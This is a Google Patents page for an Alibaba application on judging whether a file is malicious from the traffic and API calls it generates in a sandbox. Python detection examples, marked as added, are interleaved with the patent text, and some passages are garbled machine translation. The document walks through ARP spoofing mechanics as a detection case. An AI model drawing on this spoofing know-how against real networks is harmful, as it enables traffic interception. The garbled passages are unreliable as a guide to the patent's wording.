CN107483386A - Method and device for analyzing network data - Google Patents

Method and device for analyzing network data

Info

Publication number
CN107483386A
CN107483386A
Authority
CN
China
Prior art keywords
file
detected
particular type
network
judge
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN201610404659.2A
Other languages
Chinese (zh)
Inventor
马志晓
王云翔
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Alibaba Group Holding Ltd
Original Assignee
Alibaba Group Holding Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Alibaba Group Holding Ltd
Priority to CN201610404659.2A
Publication of CN107483386A
Legal status: Pending

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L 63/1416 Event detection, e.g. attack signature detection
    • H04L 63/1425 Traffic logging, e.g. anomaly detection
    • H04L 63/1441 Countermeasures against malicious traffic
    • H04L 63/145 Countermeasures against malicious traffic, the attack involving the propagation of malware through the network, e.g. viruses, trojans or worms

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Virology (AREA)
  • Computer And Data Communications (AREA)
  • Data Exchanges In Wide-Area Networks (AREA)

Abstract

This application discloses a method and device for analyzing network data. The method includes: obtaining the network traffic packets generated while a file to be detected runs in a virtualized environment; and detecting and analyzing those network traffic packets to judge whether the file to be detected is a file of a particular type. The application addresses the technical problem that, in the related art, the network traffic generated while a suspicious file runs in a virtualized environment cannot be analyzed and used as a basis for judging whether the suspicious file is a malicious file.

Description

Method and device for analyzing network data
Technical field
The application relates to the field of information security, and in particular to a method and device for analyzing network data.
Background technology
At present, with the rapid development of network information technologies such as cloud computing and big data, more and more people store and process information related to their life and work on the network. At the same time, professional attack groups driven by commercial interests or even state power have emerged, giving rise to a variety of new security threats. The resulting information security incidents, such as leakage of user information and loss of data, harm individuals, society and even national security, and the network information security threat situation grows increasingly severe.
To cope with this increasingly severe and diversified threat situation, the related art provides security devices that deploy an intrusion detection system at the gateway in order to identify malicious network attack behaviour. However, the protective capability of this kind of measure is limited: it can only discover that an attack exists in the current time window, but cannot identify which file caused the malicious network attack behaviour, and so it loses the ability to judge from network behaviour whether a file is malicious.
Based on the above problem, the related art also provides an improved scheme for deploying network security devices at the gateway. Its technical approach is to capture network traffic by port mirroring in order to analyze attack behaviour, and at the same time to reconstruct the files transmitted over the network by parsing the network protocols and redirect those files into a sandbox for dynamic behaviour analysis. Although this scheme can detect whether attack behaviour exists in the network and, from the dynamic behaviour features observed in the sandbox, detect whether a file transmitted over the network is malicious, it still cannot detect and analyze the traffic that the file itself generates during execution and use that traffic as a feature for judging whether the file is malicious.
It can be seen that existing sandbox devices (for example, intrusion detection systems) can only use dynamic behaviour features to identify malicious attack behaviour present in the current network, and the improved scheme can only identify and discover files that may be malicious; neither can link with the sandbox to associate a malicious network attack with the specific malicious file that carried it out, and so both lose the ability to judge from network behaviour whether a file is malicious.
No effective solution to the above problem has yet been proposed.
Summary of the invention
The embodiments of the application provide a method and device for analyzing network data, so as at least to solve the technical problem in the related art that the network traffic generated while a suspicious file runs in a virtualized environment cannot be analyzed and used as a basis for judging whether the suspicious file is a malicious file.
According to one aspect of the embodiments of the application, a system for analyzing network data is provided, including:
a virtualized environment, for detecting and analyzing the network traffic packets generated while a file to be detected runs in the virtualized environment, and judging whether the file to be detected is a file of a particular type; and an instruction set simulation environment, for detecting and analyzing the application programming interface (API) functions called while the file to be detected runs in the virtualized environment, together with the parameter lists corresponding to those API functions, and judging whether the file to be detected is a file of a particular type.
Optionally, the virtualized environment is a virtual machine.
Optionally, the instruction set simulation environment is an emulator-based software virtual machine.
According to another aspect of the embodiments of the application, a method for analyzing network data is provided, including:
obtaining the network traffic packets generated while a file to be detected runs in a virtualized environment; and detecting and analyzing the network traffic packets to judge whether the file to be detected is a file of a particular type.
Optionally, detecting and analyzing the network traffic packets to judge whether the file to be detected is a file of a particular type includes one of the following: judging whether the file to be detected is a file of a particular type according to whether a single network traffic packet among the captured packets contains a parameter of a preset type; or judging whether the file to be detected is a file of a particular type according to whether a plurality of mutually correlated network traffic packets among the captured packets satisfy a preset rule.
Optionally, judging whether the file to be detected is a file of a particular type according to whether a single network traffic packet contains a parameter of a preset type includes one of the following: when the single network traffic packet contains a parameter of the preset type, judging that the file to be detected is a file of the particular type; when the single network traffic packet does not contain a parameter of the preset type, judging that the file to be detected is not a file of the particular type.
Optionally, judging whether the file to be detected is a file of a particular type according to whether a plurality of mutually correlated network traffic packets satisfy a preset rule includes one of the following: when the plurality of mutually correlated network traffic packets satisfy the preset rule, judging that the file to be detected is a file of the particular type; when the plurality of mutually correlated network traffic packets do not satisfy the preset rule, judging that the file to be detected is not a file of the particular type.
Optionally, the method further includes: obtaining the application programming interface (API) functions called while the file to be detected runs in the virtualized environment; and detecting and analyzing the API functions and the parameter lists corresponding to them to judge whether the file to be detected is a file of a particular type.
Optionally, the virtualized environment is applied in a virtual machine.
Optionally, the file of the particular type is a malicious file.
According to yet another aspect of the embodiments of the application, a device for analyzing network data is also provided, including:
a first acquisition module, for obtaining the network traffic packets generated while a file to be detected runs in a virtualized environment; and a first analysis module, for detecting and analyzing the network traffic packets to judge whether the file to be detected is a file of a particular type.
Optionally, the first analysis module judges whether the file to be detected is a file of a particular type according to whether a single network traffic packet contains a parameter of a preset type; or according to whether a plurality of mutually correlated network traffic packets satisfy a preset rule.
Optionally, the first analysis module judges that the file to be detected is a file of the particular type when the single network traffic packet contains a parameter of the preset type; or judges that the file to be detected is not a file of the particular type when the single network traffic packet does not contain a parameter of the preset type.
Optionally, the first analysis module judges that the file to be detected is a file of the particular type when the plurality of mutually correlated network traffic packets satisfy the preset rule; or judges that the file to be detected is not a file of the particular type when the plurality of mutually correlated network traffic packets do not satisfy the preset rule.
Optionally, the device further includes: a second acquisition module, for obtaining the API functions called while the file to be detected runs in the virtualized environment and the parameter lists corresponding to those API functions; and a second analysis module, for detecting and analyzing the API functions and the corresponding parameter lists to judge whether the file to be detected is a file of a particular type.
Optionally, the virtualized environment is applied in a virtual machine.
Optionally, the file of the particular type is a malicious file.
In the embodiments of the application, the network traffic packets generated while the file to be detected runs in the virtualized environment are obtained, detected and analyzed, and the result of that detection and analysis is used to judge whether the file to be detected is a file of a particular type. This achieves the purpose of detecting whether the file to be detected produces traffic of a particular type, and thereby of detecting and identifying files of that type; it improves the detection accuracy for such files and reduces network security threats, and so solves the technical problem in the related art that the network traffic generated while a file to be detected runs in a virtualized environment cannot be analyzed and used as a basis for judging whether that file is a file of a particular type.
Brief description of the drawings
The drawings described here are provided for further understanding of the application and form part of it; the schematic embodiments of the application and their description serve to explain the application and do not constitute an improper limitation of it. In the drawings:
Fig. 1 is a structural block diagram of a system for analyzing network data according to an embodiment of the application;
Fig. 2 is a flow chart of a method for analyzing network data according to an embodiment of the application;
Fig. 3 is a structural block diagram of a device for analyzing network data according to an embodiment of the application;
Fig. 4 is a structural block diagram of a device for analyzing network data according to a preferred embodiment of the application;
Fig. 5 is a structural block diagram of a server according to an embodiment of the application.
Detailed description of the embodiments
In order that those skilled in the art may better understand the scheme of the application, the technical scheme in the embodiments of the application is described below clearly and completely with reference to the drawings. Obviously, the embodiments described are only some of the embodiments of the application, not all of them. All other embodiments obtained by those of ordinary skill in the art on the basis of the embodiments in the application without creative effort fall within the scope of protection of the application.
It should be noted that the terms "first", "second" and the like in the description, claims and drawings of the application are used to distinguish similar objects and not to describe a specific order or sequence. It should be understood that data so used may be interchanged where appropriate, so that the embodiments described here can be implemented in an order other than that illustrated or described. In addition, the terms "comprising" and "having" and any variants of them are intended to cover non-exclusive inclusion; for example, a process, method, system, product or device that comprises a series of steps or units is not necessarily limited to the steps or units expressly listed, but may include other steps or units that are not expressly listed or that are inherent to that process, method, product or device.
The terms used in the application are explained as follows:
Particular type file: mainly refers to a malicious file, also called malicious code, meaning software or a file that is deliberately written or configured to be installed and run on a user's computer or other terminal without the user's explicit notice or permission, infringing the user's legitimate rights and interests.
File to be detected: mainly refers to a suspicious file, meaning a file whose source is untrusted, which has destructive capability or whose execution intent cannot be determined, and which has some probability of being a malicious file.
Virtualized environment: an experimental environment provided for files whose source is untrusted, which have destructive capability or whose execution intent cannot be determined, in which the operations performed have no effect on the host operating system.
Instruction set simulation environment: an environment that simulates hardware behaviour through the execution of software instructions.
Sandbox: a way of running an application in a restricted environment, which requires limiting the code access permissions granted to the application. A sandbox is normally used to provide an experimental environment for applications whose source is untrusted, which have destructive capability or whose execution intent cannot be determined, while the changes made inside the sandbox have no effect on the operating system. The working principle of a sandbox is that, through redirection techniques, the files generated and modified by the application are redirected into the sandbox's own folder; when a given application runs, the security software first runs it in the sandbox, and if malicious behaviour is detected the application is prevented from running further, so that it can do no harm to the system.
Intrusion Detection System (IDS): a network security device or application that monitors network transmissions in real time and raises an alarm or takes active countermeasures when suspicious transmissions are found.
Embodiment 1
According to an embodiment of the application, an embodiment of a method for analyzing network data is also provided. It should be noted that the steps shown in the flow chart of the drawings may be executed in a computer system such as a set of computer-executable instructions, and that, although a logical order is shown in the flow chart, in some cases the steps shown or described may be executed in an order different from that given here.
The method embodiment provided in Embodiment 1 of the application may be executed in a server. Fig. 1 is a structural block diagram of a system for analyzing network data according to an embodiment of the application. As shown in Fig. 1, the system 10 for analyzing network data may include one or more virtualized environments 102 and an instruction set simulation environment 104. A file to be detected (for example, a suspicious file) that may be a file of a particular type (for example, a malicious file) is executed in a virtualized environment (for example, a sandbox) so as to exclude network traffic interference from the operating system and other applications; the network traffic packets generated while the suspicious file runs are monitored, captured and stored, and the packets are then detected and analyzed, so that malicious files are detected and identified from the dimension of the network traffic related to the suspicious file.
In specific implementation, the sources of suspicious files may include, but are not limited to, instant messaging software, mailbox attachments, and files uploaded to or downloaded from the network; a user submission system may also be created so that users actively submit suspicious files. The sandbox is an engineered and customized virtualized environment for executing suspicious files that closely emulates a normal environment. Its functional characteristic is that, apart from actively executing the suspicious file, it introduces no behavioural interference from the operating system or other application software that would affect the detection and analysis results. The virtual machine environment may include, but is not limited to, desktop personal computer (PC) operating systems, mobile operating systems and server operating systems, including Windows, Linux, Android and iOS, and may also include virtual execution performed by parsing and simulation.
When the sandbox executes the suspicious file, a traffic capture and analysis tool (for example, tcpdump) can capture all network traffic on the sandbox network interface card, or the traffic of the sandbox network interface card can be mirrored, and the network traffic generated while the sandbox executes the suspicious file is stored.
Whether the suspicious file is a malicious file is judged by analyzing the network traffic generated during its execution. Specifically, if, by parsing a single network traffic packet and analyzing the network protocol features of the transport-layer protocol (for example, Transmission Control Protocol (TCP) or User Datagram Protocol (UDP)) and/or the application-layer protocol (for example, Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Domain Name System (DNS), Network File System (NFS), Simple Mail Transfer Protocol (SMTP) or Simple Network Management Protocol (SNMP)), it can be determined that the single packet contains parameter information that it should not carry (for example, a character string that performs malicious behaviour), then the suspicious file can on that basis be identified as a malicious file. However, if parsing a single network traffic packet cannot accurately determine whether the suspicious file is malicious, then whether the suspicious file exhibits malicious network behaviour must be judged by whether a plurality of mutually correlated packets among the captured network traffic packets satisfy a preset rule.
In addition, when the suspicious file executes in the sandbox, the instruction set simulation environment can reconstruct kernel modules such as system calls and processes from the instruction level upward, so as to obtain the behaviour of the suspicious file during dynamic execution and to monitor and record all API functions the suspicious file calls at run time together with their parameter information. In specific implementation, the API functions called in succession by the suspicious file within a preset time, starting from the initial environment state, may be recorded. Through the instruction set simulation environment, host behaviours such as process injection, registry operations, memory operations and file operations during the loading and execution of the suspicious file, and network behaviours such as network redirection, DNS lookups, FTP connections, HTTP access and e-mail login and sending, can be monitored; malicious access to system resources such as processes, memory, files, the registry, the host environment and the network can be exposed; and host events such as USB flash drive insertion and CD insertion can be simulated.
For example, the suspicious file successively executes API functions such as WNetAddConnection (creates a persistent connection to a network resource), PostThreadMessage (posts a message to an application), CreateDirectory (creates a new directory) and CreateFile (opens or creates a file, pipe, mailslot, communication service, device or console), forming an operation sequence composed of multiple API functions. By analyzing whether each API function and its parameters exhibit malicious features or intent, and by performing behavioural similarity matching between the API function operation sequence called by the suspicious file and the sequence called by a normal file, it can be judged whether the suspicious file exhibits malicious behaviour, and hence detected and identified whether the suspicious file is a malicious file.
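The comparison just described, as an added example in Python that is not part of the patent: two constructed call traces (labelled as such in the code), a per-call parameter check against hypothetical suspicious features, and a bigram Jaccard similarity between the suspect's call order and a benign baseline. The feature lists, the threshold and the traces are assumptions made for illustration only.

```python
from collections import Counter
from typing import Dict, List, Sequence, Tuple

# A recorded API call: function name plus its parameter list, as the instruction
# set simulation environment would log it. The traces below are constructed for
# this example; they were not recorded from any sample.
Call = Tuple[str, Tuple[str, ...]]

# Hypothetical parameter features that count as malicious intent for a given
# API function; a real system summarizes these from analysis of many samples.
SUSPICIOUS_PARAMETERS: Dict[str, Tuple[str, ...]] = {
    "WNetAddConnection": ("ADMIN$", "C$"),   # persistent connection to a hidden admin share
    "CreateFile": ("\\System32\\",),         # dropping a file into the system directory
}

BASELINE_TRACE: List[Call] = [               # constructed trace of a benign installer
    ("CreateDirectory", ("C:\\Program Files\\App",)),
    ("CreateFile", ("C:\\Program Files\\App\\app.exe",)),
    ("PostThreadMessage", ("0x1a2c", "WM_APP")),
    ("CreateFile", ("C:\\Program Files\\App\\config.ini",)),
]

SUSPECT_TRACE: List[Call] = [                # the four functions the description names, constructed parameters
    ("WNetAddConnection", ("\\\\10.0.0.5\\ADMIN$", "Z:")),
    ("PostThreadMessage", ("0x1a2c", "WM_USER")),
    ("CreateDirectory", ("C:\\Windows\\System32\\drv",)),
    ("CreateFile", ("C:\\Windows\\System32\\drv\\svc.sys",)),
]


def flag_parameters(calls: Sequence[Call]) -> List[Call]:
    """Per-call check: return the calls whose parameters carry a suspicious feature."""
    return [(name, params) for name, params in calls
            if any(needle in p for needle in SUSPICIOUS_PARAMETERS.get(name, ()) for p in params)]


def bigrams(names: Sequence[str]) -> Counter:
    """Adjacent-call pairs; they capture the order of the operation sequence."""
    return Counter(zip(names, names[1:]))


def sequence_similarity(a: Sequence[Call], b: Sequence[Call]) -> float:
    """Jaccard similarity of the call-order bigrams of two traces (1.0 = same order)."""
    ca, cb = bigrams([n for n, _ in a]), bigrams([n for n, _ in b])
    inter = sum((ca & cb).values())
    union = sum((ca | cb).values())
    return inter / union if union else 1.0


def judge(calls: Sequence[Call], baseline: Sequence[Call], threshold: float = 0.5) -> dict:
    """Malicious if any parameter is suspicious, or the call order is too unlike the benign baseline."""
    flagged = flag_parameters(calls)
    similarity = sequence_similarity(calls, baseline)
    return {"malicious": bool(flagged) or similarity < threshold,
            "similarity": similarity, "flagged": flagged}


if __name__ == "__main__":
    print(judge(SUSPECT_TRACE, BASELINE_TRACE))
```

Matching against a single "normal file" trace, as here, will also flag benign programs whose call order simply differs from the baseline; in practice the similarity is taken against a corpus of benign traces, and the parameter check carries most of the weight.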
In a preferred embodiment, on the basis of detecting and analyzing the dynamic behaviour of the suspicious file, a network traffic detection function at the level of the single file is added to identify known or unknown attack behaviour, so that whether a single file is a malicious file is identified and characterized from the dimension of network traffic; this improves malicious file detection and reduces network security threats.
Under the above operating environment, the application provides the method for analyzing network data shown in Fig. 2. Fig. 2 is a flow chart of the method for analyzing network data according to an embodiment of the application. As shown in Fig. 2, the method may include the following processing steps:
Step S20: obtaining the network traffic packets generated while a file to be detected runs in a virtualized environment;
Step S22: detecting and analyzing the network traffic packets to judge whether the file to be detected is a file of a particular type.
In a preferred embodiment, the network traffic packets generated while the suspicious file runs in the customized virtualized environment can be monitored, captured and stored, and then detected and analyzed, so that malicious files are detected and identified relying solely on the single dimension of the network traffic related to the suspicious file.
Taking a guest operating system (Guest OS) as an example, the sandbox must first be started; the suspicious file is then uploaded from the host into the Guest OS over the virtual network connection, the Guest OS completes the monitoring and capture of the network traffic packets, and the packets are then detected and analyzed, so that malicious files are detected and identified from the dimension of the network traffic related to the suspicious file.
Optionally, in step S22, detecting and analyzing the network traffic packets to judge whether the file to be detected is a file of a particular type may include one of the following modes:
Mode one: judging whether the suspicious file is a malicious file according to whether a single network traffic packet contains a parameter of a preset type;
Mode two: judging whether the suspicious file is a malicious file according to whether a plurality of mutually correlated network traffic packets satisfy a preset rule.
As described above, when the sandbox executes the suspicious file, a traffic capture and analysis tool (for example, tcpdump) captures all network traffic on the sandbox network interface card, or that traffic is mirrored, and the traffic generated while the suspicious file executes is stored.
Whether the suspicious file is a malicious file is then judged by analyzing that traffic. Specifically, if parsing a single network traffic packet and analyzing the protocol features of its transport-layer protocol (for example, TCP or UDP) and/or application-layer protocol (for example, HTTP, FTP, DNS, NFS, SMTP or SNMP) shows that the single packet contains parameter information it should not carry (for example, a character string that performs malicious behaviour), the suspicious file can on that basis be identified as a malicious file.
It should be noted that the above parameter information can be obtained by performing static analysis on a large number of samples of different types in repeated experiments and summarizing the parameters related to malicious behaviour; these are then set as the preset-type parameters used as the comparison reference in subsequent detection and analysis.
However, if parsing a single network traffic packet cannot accurately determine whether the suspicious file is malicious, then whether the suspicious file exhibits malicious network behaviour must be judged by whether a plurality of mutually correlated packets among the captured network traffic packets satisfy a preset rule.
Optionally, in mode one, judging whether the suspicious file is a malicious file according to whether a single network traffic packet contains a parameter of a preset type may include one of the following determination results:
Determination result one: when the single network traffic packet contains a parameter of the preset type, the suspicious file is judged to be a malicious file;
Determination result two: when the single network traffic packet does not contain a parameter of the preset type, the suspicious file is judged not to be a malicious file.
In a preferred embodiment, the above network traffic packets can be obtained with the tcpdump tool. tcpdump is a command-line packet capture tool that lets the user intercept and display the Transmission Control Protocol (TCP)/Internet Protocol (IP) and other packets transmitted or received over the network connection of the computer. tcpdump is available on most Unix-like operating systems (for example, Linux and BSD). In specific implementation, the tcpdump command-line option "-i" indicates the network interface card that tcpdump is to monitor (in this preferred embodiment, the sandbox network interface card); the option "-X" indicates that tcpdump should print the protocol headers and packet contents in full, in hexadecimal and ASCII, to facilitate protocol analysis; the option "-c" indicates the number of network traffic packets tcpdump is to capture; and the option "-w" indicates that tcpdump should write the captured packets directly into a specified file, i.e. store them on disk for use in detection and analysis.
It can be exported in corresponding by keying in the tcpdump order line related to monitoring sandbox network interface card set in advance Hold, its content exported can generally include following components:
(1) what is currently monitored is the network flow data bag for flowing through sandbox network interface card, and its link layer is based on Ethernet, institute The population size limitation for the packet to be captured;
(2) time of each network flow data coating capture, including:When, minute, second, even microsecond;
(3) flow direction of each network flow data bag, it is included:The source medium education of the network flow data bag (MAC) address, the transmission direction of the network flow data bag, the target MAC (Media Access Control) address of the network flow data bag, and Ether frame Protocol type;
(4) length of Ether frame, and the source IP address of the network flow data bag, the transmission of the network flow data bag Direction, the purpose IP address of the network flow data bag;
(5) other guide such as TCP, IP stem.
It can get whether to include in each network flow data bag by tcpdump output result and there is malice row The character string information being characterized, such as:Source IP address carries trojan horse in the Email attachment sent to purpose IP address. It is malicious file to thereby determine that apocrypha corresponding with the network flow data bag.
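As an added example (not code from the patent), the following Python reads tcpdump output laid out as in items (2) to (5) above, reassembles each packet from the "-X" hex rows, and applies the single-packet determination. It assumes the capture was also taken with "-e", so that the MAC addresses appear on the summary line; the preset-type parameters and the sample capture are constructed.

```python
"""Parse tcpdump text in the layout listed above and apply the single-packet rule."""
import re
import struct
from dataclasses import dataclass

# Preset-type parameters (constructed; the text derives them from static analysis of many samples).
PRESET_TYPE_PARAMETERS = (b'filename="doc.exe"', b"application/x-msdownload")

# Summary line tcpdump -e prints for an IPv4 packet: time, MACs, ethertype, frame length, IPs.
HEADER_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+) (?P<smac>[0-9a-f:]{17}) > (?P<dmac>[0-9a-f:]{17}), "
    r"ethertype (?P<etype>\S+) \(0x[0-9a-f]{4}\), length (?P<flen>\d+): "
    r"(?P<sip>[\d.]+)\.(?P<sport>\d+) > (?P<dip>[\d.]+)\.(?P<dport>\d+):"
)


@dataclass
class Packet:
    timestamp: str
    src_mac: str
    dst_mac: str
    ethertype: str
    frame_len: int
    src_ip: str
    dst_ip: str
    raw: bytes = b""  # bytes reassembled from the -X hex rows; they start at the IP header

    def payload(self) -> bytes:
        """Step over the IPv4 header and the TCP/UDP header to reach the application data."""
        if len(self.raw) < 20 or self.raw[0] >> 4 != 4:
            return b""
        ihl = (self.raw[0] & 0x0F) * 4
        proto = self.raw[9]
        if proto == 6 and len(self.raw) >= ihl + 20:  # TCP: data offset in byte 12 of its header
            return self.raw[ihl + (self.raw[ihl + 12] >> 4) * 4:]
        if proto == 17:  # UDP: fixed 8-byte header
            return self.raw[ihl + 8:]
        return self.raw[ihl:]


def parse_tcpdump(text: str) -> list[Packet]:
    """Turn tcpdump -e -X output into Packet records (one summary line plus its hex rows)."""
    packets: list[Packet] = []
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            packets.append(Packet(m["ts"], m["smac"], m["dmac"], m["etype"],
                                  int(m["flen"]), m["sip"], m["dip"]))
        elif line.lstrip().startswith("0x") and packets:
            # "0x0010:  4500 003c ...  E..<": hex groups lie between the offset and a double space
            hex_part = line.split(":", 1)[1].strip().split("  ")[0]
            packets[-1].raw += bytes.fromhex(hex_part.replace(" ", ""))
    return packets


def judge_packet(pkt: Packet) -> list[bytes]:
    """Preset-type parameters present in this one packet; an empty list means 'not malicious'."""
    data = pkt.payload()
    return [p for p in PRESET_TYPE_PARAMETERS if p in data]


def judge_capture(text: str) -> tuple[bool, list[str]]:
    """Verdict for the file whose traffic was captured, with one line per matching packet."""
    hits = [f"{pkt.timestamp} {pkt.src_ip} -> {pkt.dst_ip}: {p.decode()}"
            for pkt in parse_tcpdump(text) for p in judge_packet(pkt)]
    return bool(hits), hits


# ---- constructed sample capture rendered in tcpdump -e -X layout (not real traffic) ----
def _ipv4_tcp(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Minimal IPv4 and TCP headers (no options, zero checksums) in front of the payload."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0x1C46, 0x4000, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 0x50, 0x18, 502, 0, 0)
    return ip + tcp + payload


def _hex_dump(data: bytes) -> str:
    """Render bytes as tcpdump -X does: offset, 4-hex-digit groups, then an ASCII column."""
    rows = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        rows.append(f"\t0x{off:04x}:  {groups:<39}  {text}")
    return "\n".join(rows)


def _frame(ts, smac, dmac, src, dst, sport, dport, payload):
    pkt = _ipv4_tcp(src, dst, sport, dport, payload)
    head = (f"{ts} {smac} > {dmac}, ethertype IPv4 (0x0800), length {14 + len(pkt)}: "
            f"{src}.{sport} > {dst}.{dport}: Flags [P.], seq 1:{1 + len(payload)}, ack 1, "
            f"win 502, length {len(payload)}")
    return head + "\n" + _hex_dump(pkt)


# Host A (22:22:...) mailing an executable to host B, then host B fetching a page from the gateway.
SAMPLE_CAPTURE = "\n".join([
    _frame("12:00:00.000100", "22:22:22:22:22:22", "66:66:66:66:66:66", "192.168.1.22",
           "192.168.1.66", 52341, 25, b'Content-Disposition: attachment; filename="doc.exe"\r\n'),
    _frame("12:00:00.000900", "66:66:66:66:66:66", "01:01:01:01:01:01", "192.168.1.66",
           "192.168.1.1", 40001, 80, b"GET / HTTP/1.1\r\nHost: gateway.local\r\n\r\n"),
])
```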
Optionally, in the second approach above, judging whether the suspicious file is a malicious file according to whether the preset rule is satisfied among multiple mutually related network traffic packets can give one of the following determination results:
Determination result one: when the preset rule is satisfied among the multiple mutually related network traffic packets, the suspicious file is determined to be a malicious file;
Determination result two: when the preset rule is not satisfied among the multiple mutually related network traffic packets, the suspicious file is determined not to be a malicious file.
From the above analysis, if parsing a single network traffic packet cannot accurately determine whether the suspicious file is a malicious file, then whether the suspicious file exhibits malicious network behaviour must be judged from whether the preset rule is satisfied among multiple mutually related packets within the network traffic.
In a preferred embodiment, the following scenario can be simulated in the sandbox. Assume that host A has source IP address 192.168.1.22 and source MAC address 22-22-22-22-22-22; host B has destination IP address 192.168.1.66 and destination MAC address 66-66-66-66-66-66; and the gateway has IP address 192.168.1.1 and MAC address 01-01-01-01-01-01. In normal communication, host A and host B each exchange data independently with the gateway, and there is no data exchange between host A and host B. However, host A sends an ARP spoofing packet (an ARP reply) to host B announcing "host A is the gateway; host B may send the data destined for the external network to host A". The ARP spoofing packet is as follows:
Source IP address: 192.168.1.1, source MAC address: 22-22-22-22-22-22;
Destination IP address: 192.168.1.66, destination MAC address: 66-66-66-66-66-66.
Host A then sends another ARP spoofing packet (an ARP reply) to the gateway announcing "host A is host B", so that the gateway sends all data destined for host B to host A. That ARP spoofing packet is as follows:
Source IP address: 192.168.1.66, source MAC address: 66-66-66-66-66-66;
Destination IP address: 192.168.1.1, destination MAC address: 01-01-01-01-01-01.
It should be noted that the ARP spoofing packets above have to be re-sent at regular intervals; otherwise the ARP caches of the gateway and host B will be refreshed on their timers.
The ARP spoofing process above creates incorrect IP-MAC mappings in the dynamic ARP tables of the gateway and of the victim host B by sending ARP reply packets.
In this scenario it is likely to be difficult to accurately determine, by parsing a single network traffic packet, whether the suspicious file is a malicious file; instead the multiple packets that make up the whole ARP spoofing process must be detected and analysed together to determine whether they change the original IP-MAC mapping (this is the preset rule referred to above). In this way, whether the preset rule is satisfied among multiple mutually related network traffic packets is used to judge whether the suspicious file exhibits malicious network behaviour.
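The preset rule for the ARP scenario, as an added Python example (not code from the patent): the ARP replies seen in the sandbox are replayed against the original IP-MAC table of the simulated network, and any reply that rebinds a known IP to another MAC is reported together with how often and how regularly it was re-sent. The capture is constructed; in it both spoofed replies carry host A's MAC as the sender address, so that traffic for the claimed IP is redirected to host A.

```python
"""Multi-packet rule: does any ARP reply change the original IP-MAC mapping?"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    timestamp: float  # seconds since the start of the capture
    sender_ip: str    # the IP the reply claims to own
    sender_mac: str   # the MAC it wants bound to that IP
    target_ip: str    # the host whose ARP cache is being updated
    target_mac: str


def find_mapping_changes(replies, baseline):
    """One record per (claimed IP, bogus MAC) that differs from the original mapping.

    The record also counts the repetitions and their average spacing, since a spoofed
    binding has to be re-sent before the victim's ARP cache refreshes on its timer."""
    table = dict(baseline)  # original mappings; an IP seen for the first time is learned as-is
    changes = {}
    for r in sorted(replies, key=lambda x: x.timestamp):
        original = table.setdefault(r.sender_ip, r.sender_mac)
        if r.sender_mac == original:
            continue
        rec = changes.setdefault((r.sender_ip, r.sender_mac),
                                 {"original_mac": original, "victims": set(), "times": []})
        rec["victims"].add(r.target_ip)
        rec["times"].append(r.timestamp)
    for rec in changes.values():
        gaps = [b - a for a, b in zip(rec["times"], rec["times"][1:])]
        rec["count"] = len(rec["times"])
        rec["period"] = round(sum(gaps) / len(gaps), 3) if gaps else None
    return changes


def judge_arp_traffic(replies, baseline):
    """Determination: malicious when at least one original mapping was changed."""
    changes = find_mapping_changes(replies, baseline)
    return bool(changes), changes


# Original mappings of the simulated network, taken from the scenario in the text.
BASELINE = {
    "192.168.1.1": "01:01:01:01:01:01",   # gateway
    "192.168.1.22": "22:22:22:22:22:22",  # host A
    "192.168.1.66": "66:66:66:66:66:66",  # host B
}

# Constructed capture: host A tells host B "192.168.1.1 is at A's MAC" and tells the gateway
# "192.168.1.66 is at A's MAC", repeating both every 10 s; one genuine gateway reply in between.
SAMPLE_REPLIES = [
    ArpReply(t, "192.168.1.1", "22:22:22:22:22:22", "192.168.1.66", "66:66:66:66:66:66")
    for t in (0.0, 10.0, 20.0)
] + [
    ArpReply(t, "192.168.1.66", "22:22:22:22:22:22", "192.168.1.1", "01:01:01:01:01:01")
    for t in (0.5, 10.5, 20.5)
] + [ArpReply(5.0, "192.168.1.1", "01:01:01:01:01:01", "192.168.1.22", "22:22:22:22:22:22")]
```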
Optionally, the above method may also include the following steps:
Step S24: obtain the application programming interface (API) functions called while the suspicious file runs in the virtualised environment;
Step S26: detect and analyse the API functions and the parameter lists corresponding to them, and judge whether the suspicious file is a malicious file.
It should be noted that the process of steps S24 to S26, which obtains the second detection and analysis result by detecting and analysing the API functions and their corresponding parameter lists, is independent of the process above that obtains the first detection and analysis result by detecting and analysing the network traffic packets; there is no fixed order of execution between them. In other words, the process of steps S24 to S26 may take place before step S20, after step S22, or of course between step S20 and step S22.
API functions are predefined functions whose purpose is to give application programs and developers the ability to access a set of routines based on particular software or hardware, without needing access to the source code or an understanding of the details of the internal mechanism.
